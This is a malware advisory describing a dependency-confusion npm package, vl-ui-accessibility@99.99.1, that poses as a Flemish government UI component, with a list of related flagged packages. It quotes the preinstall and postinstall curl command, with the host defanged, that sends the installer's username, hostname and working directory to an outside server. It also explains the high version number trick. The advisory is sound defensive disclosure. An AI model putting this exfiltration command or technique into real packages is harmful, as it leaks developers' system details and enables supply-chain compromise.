vl-ui-accessibility@99.99.1
Malicious code in vl-ui-accessibility (npm)
Analysis
Dependency-confusion package impersonating the vl-ui-accessibility Flemish government UI component. On install, both the preinstall and postinstall lifecycle hooks execute: curl -s "hxxps://178fx66q[.]instances[.]httpworkbench[.]com/depconf/vl-ui-accessibility/?u=$(whoami)&h=$(hostname)&d=$PWD&t=$(date +%s)" sending the installer's username, hostname, working directory, and timestamp to an external httpworkbench instance (178fx66q[.]instances[.]httpworkbench[.]com). The package contains no real functionality — index.js is a single comment line. The version 99.99.1 is intended to win version resolution in dependency-confusion scenarios against the legitimate vl-ui-accessibility package.
- analyzed by
- Leitwacht
- first seen
- Jun 15, 2026, 08:58 PM
- analyzed
- Jun 15, 2026, 08:58 PM
Related advisories
- unico-check@9.9.9
- unico-android@9.9.9
- field-plus@99.99.1
- ugent_uws@10.9.11
- ogd-analytics@1.0.0
- nic-datagov@1.0.0
- ts-enum-helper@1.0.0
- tether-base@99.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.